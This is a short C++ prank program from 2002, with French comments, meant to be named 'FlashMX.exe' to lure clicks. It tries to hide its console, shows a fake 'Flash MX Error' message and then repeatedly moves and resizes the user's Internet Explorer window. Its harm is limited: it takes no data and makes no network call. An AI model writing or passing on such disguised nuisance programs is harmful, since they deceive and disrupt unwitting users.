#include <iostream.h>
#include <windows.h>
/* 
   Name:            what U want...i've call it "FlashMX.exe" cause lot of people click ! :p
   Author:          BlackWizzard <BlackWizzard@fuckwindows.com>
   Description:     MS Internet Explorer Is now crazy! :)
   Date:            23/05/02 but i'm not sure...
   Copyright:       None! :p It's free!
   Another :        I'm frensh, so, all comment are frensh too! sorry! :)
*/

 int main()
{
     int x2;
     int y2;
 /* On rend invisible la console ::
 x : 0
 y : 0
 width : 0
 height : 0
 */
 SetWindowPos(FindWindow("ConsoleWindowClass",NULL),HWND_TOP,0,0,0,0,SWP_SHOWWINDOW);
 /* On fait une msgbox d'erreur... 
  _____________________________________________
 | F| Flash MX Error!                          |
 |__|__________________________________________|
 |                                             |
 |  |X|  Unknow Error as occur in FlashMX.exe  |
 |_____________________________________________|
 
 heu...je dessine mal en ascii :p
 */
 MessageBox (NULL, "Unknow error as occur in FlashMX.exe." , "Flash MX Error!", 0 + MB_ICONHAND + MB_SYSTEMMODAL);

     for(x2 = 0; x2 < 1024; x2=x2+5) // Changer 1024 par la largeur de votre écran
        {
         for(y2 = 0; y2 < 800; y2++)// Changer 800 par la hauteur de votre écran
        {
        /* 
        On change la taille et la position de la fenetre d'Internet explorer active
        ainsi, si on clique sur une autre fenetre d'IE, elle deviendra folle a son tour alors
        que l'autre va se stopper.
        
        ça fait un bel effet au lycée! :)
        */
         SetWindowPos(FindWindow("IEFrame",NULL),HWND_TOP,x2,y2,x2/2,y2/2,SWP_SHOWWINDOW);
        }
         }

}

